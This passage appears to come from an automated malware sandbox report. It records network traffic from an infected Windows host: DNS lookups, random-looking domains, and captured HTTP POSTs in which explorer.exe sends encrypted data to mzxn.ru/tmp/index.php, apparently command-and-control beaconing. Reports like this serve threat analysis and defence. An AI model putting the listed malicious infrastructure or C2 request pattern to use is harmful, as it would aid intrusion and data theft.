                                                                              Jul 27, 2024 14:56:00.468460083 CEST8049879185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:00.468539953 CEST8049879185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:00.468739033 CEST4987980192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:00.468853951 CEST4987980192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:00.475615025 CEST8049879185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:01.538789988 CEST44349880107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:01.538975954 CEST44349880107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:01.539170980 CEST49880443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:01.552853107 CEST49880443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:01.552903891 CEST44349880107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:01.552978992 CEST49880443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:01.552994967 CEST44349880107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:01.659975052 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:01.660058022 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:01.660167933 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:01.660649061 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:01.660753965 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:02.325561047 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:02.325817108 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:02.327955961 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:02.328007936 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:02.328315020 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:02.328366995 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:02.329145908 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:02.329375029 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:02.376574993 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:03.334963083 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:03.335351944 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:03.335465908 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:03.349404097 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:03.349436045 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:03.349452019 CEST49881443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:56:03.349459887 CEST44349881167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:56:03.459985971 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:03.460053921 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:03.460239887 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:03.460602999 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:03.460639954 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:04.284575939 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:04.284693956 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:04.286958933 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:04.287009954 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:04.287084103 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:04.287096024 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:04.287522078 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:04.287673950 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:04.332525969 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:05.263104916 CEST4988380192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:05.269089937 CEST8049883185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:05.269162893 CEST4988380192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:05.269274950 CEST4988380192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:05.269290924 CEST4988380192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:05.277311087 CEST8049883185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:05.277354002 CEST8049883185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:05.517347097 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:05.517545938 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:05.517622948 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:05.533655882 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:05.533655882 CEST49882443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:56:05.533700943 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:05.533729076 CEST44349882107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:56:05.644186974 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:05.644268036 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:05.644891024 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:05.645414114 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:05.645492077 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:06.222457886 CEST8049883185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:06.222513914 CEST8049883185.18.245.58192.168.2.4
                                                                              Jul 27, 2024 14:56:06.222805023 CEST4988380192.168.2.4185.18.245.58
                                                                              Jul 27, 2024 14:56:06.271159887 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:06.271482944 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:06.273567915 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:06.273619890 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:06.273824930 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:06.273837090 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:06.274044037 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:06.274190903 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:06.274221897 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:07.530894041 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:07.531059027 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:07.531243086 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:07.551883936 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:07.551883936 CEST49884443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:56:07.551949024 CEST44349884107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:56:07.552031994 CEST44349884107.173.160.139192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 27, 2024 14:52:23.497483969 CEST5712753192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:52:24.487185955 CEST5712753192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:52:25.502573967 CEST5712753192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:52:25.862639904 CEST53571271.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:52:25.862689018 CEST53571271.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:52:25.862716913 CEST53571271.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:53:06.723237991 CEST5064753192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:53:06.764564991 CEST53506471.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:53:20.020473003 CEST5797953192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:53:20.033770084 CEST53579791.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:53:27.053896904 CEST6543953192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:53:27.061175108 CEST53654391.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:53:28.414673090 CEST5208353192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:53:28.432049990 CEST53520831.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:53:30.235780001 CEST5733853192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:53:30.271198034 CEST53573381.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:54:59.248512030 CEST5163653192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:55:00.237262964 CEST5163653192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:55:01.237404108 CEST5163653192.168.2.41.1.1.1
                                                                              Jul 27, 2024 14:55:02.491103888 CEST53516361.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:55:02.491162062 CEST53516361.1.1.1192.168.2.4
                                                                              Jul 27, 2024 14:55:02.491208076 CEST53516361.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jul 27, 2024 14:52:23.497483969 CEST192.168.2.41.1.1.10xc19aStandard query (0)mzxn.ruA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:24.487185955 CEST192.168.2.41.1.1.10xc19aStandard query (0)mzxn.ruA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.502573967 CEST192.168.2.41.1.1.10xc19aStandard query (0)mzxn.ruA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:06.723237991 CEST192.168.2.41.1.1.10x896cStandard query (0)mussangroup.comA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:20.020473003 CEST192.168.2.41.1.1.10xd6cdStandard query (0)funrecipebooks.comA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:27.053896904 CEST192.168.2.41.1.1.10x9991Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:28.414673090 CEST192.168.2.41.1.1.10x287dStandard query (0)callosallsaospz.shopA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:30.235780001 CEST192.168.2.41.1.1.10xaab4Standard query (0)store4.gofile.ioA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:54:59.248512030 CEST192.168.2.41.1.1.10x9c5cStandard query (0)mzxn.ruA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:00.237262964 CEST192.168.2.41.1.1.10x9c5cStandard query (0)mzxn.ruA (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:01.237404108 CEST192.168.2.41.1.1.10x9c5cStandard query (0)mzxn.ruA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru190.218.33.19A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru210.182.29.70A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru186.182.55.44A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862639904 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru219.92.154.145A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru190.218.33.19A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru210.182.29.70A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru186.182.55.44A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862689018 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru219.92.154.145A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru190.218.33.19A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru210.182.29.70A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru186.182.55.44A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:52:25.862716913 CEST1.1.1.1192.168.2.40xc19aNo error (0)mzxn.ru219.92.154.145A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:06.764564991 CEST1.1.1.1192.168.2.40x896cNo error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:20.033770084 CEST1.1.1.1192.168.2.40xd6cdNo error (0)funrecipebooks.com162.0.235.84A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:27.061175108 CEST1.1.1.1192.168.2.40x9991No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:27.061175108 CEST1.1.1.1192.168.2.40x9991No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:27.061175108 CEST1.1.1.1192.168.2.40x9991No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:28.432049990 CEST1.1.1.1192.168.2.40x287dNo error (0)callosallsaospz.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:28.432049990 CEST1.1.1.1192.168.2.40x287dNo error (0)callosallsaospz.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:53:30.271198034 CEST1.1.1.1192.168.2.40xaab4No error (0)store4.gofile.io31.14.70.245A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.129.118.140A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru160.177.221.142A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.128.101.211A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491103888 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.129.118.140A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru160.177.221.142A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.128.101.211A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491162062 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.129.118.140A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru160.177.221.142A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru187.199.183.102A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru201.103.170.60A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru181.128.101.211A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                              Jul 27, 2024 14:55:02.491208076 CEST1.1.1.1192.168.2.40x9c5cNo error (0)mzxn.ru130.204.29.121A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • mussangroup.com
                                                                              • 167.235.128.153
                                                                              • 107.173.160.137
                                                                              • 107.173.160.139
                                                                              • funrecipebooks.com
                                                                              • rentry.co
                                                                              • callosallsaospz.shop
                                                                              • store4.gofile.io
                                                                              • uqfmsjorvfs.com
                                                                                • mzxn.ru
                                                                              • tcmckmrwfkcun.com
                                                                              • bhwagrsoolcnla.com
                                                                              • kjroavoygfbpsdwi.net
                                                                              • mvqckdwrharucrcg.net
                                                                              • mouvjsinrynjyai.com
                                                                              • tbyklxggimhnmx.org
                                                                              • xnfvpysrwik.com
                                                                              • 77.221.157.163
                                                                              • ipccodalkut.com
                                                                              • kuebqjlbbtfbj.com
                                                                              • jtflrtuktjsvucm.com
                                                                              • cpopopnbritilda.org
                                                                              • topqgimihpqwm.net
                                                                              • 64.190.113.113
                                                                              • oafowudievrov.org
                                                                              • elufhismjek.net
                                                                              • khpnbaaufwo.net
                                                                              • svsbhghbajavukge.com
                                                                              • imbyndnwddlepn.com
                                                                              • gturrgitewwfodad.org
                                                                              • jtjyrojvaxip.com
                                                                              • yldujrgvckqrx.org
                                                                              • luwfiaifgqhasu.com
                                                                              • caikuwutundsm.net
                                                                              • gbpatnncurmtwi.net
                                                                              • uscjenooturcoqoa.org
                                                                              • grdkefqyouewk.org
                                                                              • cygkjkiviqedpm.com
                                                                              • qomfulqdiho.com
                                                                              • vjfcjpfahwpvryik.org
                                                                              • kxorbjsgbgmdfrl.org
                                                                              • uyxucdsovulqgtjk.org
                                                                              • ibglipwvpfkcey.com
                                                                              • ocdcprhbwfbxhxuk.com
                                                                              • pkmludkekcakr.org
                                                                              • lybbhvahdtjryena.com
                                                                              • pdbeoiobqtywre.net
                                                                              • htnaerjwhiw.com
                                                                              • bhwqpbeenxy.org
                                                                              • wdxtdkqyiajmua.com
                                                                              • ehjigvnhybkqlwa.com
                                                                              • odshsrqjavtmlfdu.net

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449736187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:25.874308109 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uqfmsjorvfs.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 332
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:25.874308109 CEST332OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 48 da a4
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu7HMff05T#3eu-C8=?UW@o8ji&Bko{C=,M5*^@!6tJnl1X4m}\p
                                                                              Jul 27, 2024 14:52:27.422575951 CEST152INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 04 00 00 00 72 e8 85 e5
                                                                              Data Ascii: r
                                                                              Jul 27, 2024 14:52:27.422745943 CEST152INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 04 00 00 00 72 e8 85 e5
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449737187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:27.433777094 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://tcmckmrwfkcun.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 148
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:27.433809996 CEST148OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 23 25 e2 e4
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu#%[xq\0QX\;m-ft@+X6@):;d`3h
                                                                              Jul 27, 2024 14:52:28.474617004 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:28 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
